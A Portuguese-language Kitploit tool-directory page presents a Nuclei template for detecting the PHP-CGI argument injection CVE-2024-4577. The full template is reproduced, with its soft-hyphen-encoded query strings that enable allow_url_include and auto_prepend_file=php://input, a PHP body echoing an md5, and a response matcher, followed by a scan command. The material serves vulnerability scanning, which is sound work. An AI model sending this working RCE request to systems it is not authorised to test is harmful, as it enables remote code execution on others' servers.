Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-4577-Nuclei-Template — Nuclei template para detectar a vulnerabilidade de injeção de argumentos PHP CGI CVE-2024-4577, possibilitando testes automatizados de RCE através de requisições HTTP manipuladas e correspondência de respostas. | Kitploit
Ferramentas/GitHubGitHub/huseyinstif/cve-2024-4577-nuclei-template
Scanners de VulnerabilidadesAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubhuseyinstif/cve-2024-4577-nuclei-template

CVE-2024-4577-Nuclei-Template

Nuclei template para detectar a vulnerabilidade de injeção de argumentos PHP CGI CVE-2024-4577, possibilitando testes automatizados de RCE através de requisições HTTP manipuladas e correspondência de respostas.

Ver Repositório
2224há 2 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Template Nuclei para CVE-2024-4577

Este repositório contém um template Nuclei para detectar a vulnerabilidade de Injeção de Argumento PHP CGI identificada como CVE-2024-4577.

Detalhes do Template

root@kitploit:~
id: CVE-2024-4577

info:
  name: CVE-2024-4577 PHP CGI Argument Injection
  author: Hüseyin TINTAŞ
  severity: critical
  description: >
    CVE-2024-4577 PHP CGI Argument Injection Vulnerability.
    This template checks if the response contains "CVE_2024_4577_TEST" indicating a successful injection.
  tags: cve,cve2024,php,cgi,rce,cve2024-4577

http:
  - method: POST
    path:
      - "{{BaseURL}}/cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/cgi-bin/php.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/php-cgi/php.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/index.test?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      
    headers:
      User-Agent: "curl/8.3.0"
      Accept: "*/*"
      Content-Type: "application/x-www-form-urlencoded"
      Connection: "keep-alive"
    body: |
      <?php echo md5("CVE_2024_4577_TEST"); ?>
    matchers:
      - type: word
        part: body
        words:
          - "83946a388fdf6cd2707eed8550575a76"

Uso

Para usar este template com o Nuclei, salve o conteúdo do template em um arquivo chamado CVE-2024-4577.yaml e execute o seguinte comando:

root@kitploit:~
nuclei -t CVE-2024-4577.yaml -u <target-url>

Substitua <target-url> pela URL do alvo que deseja escanear.

Contato

Para quaisquer dúvidas ou mais informações, você pode entrar em contato comigo através de:

  • LinkedIn
  • Twitter
Baixar ferramenta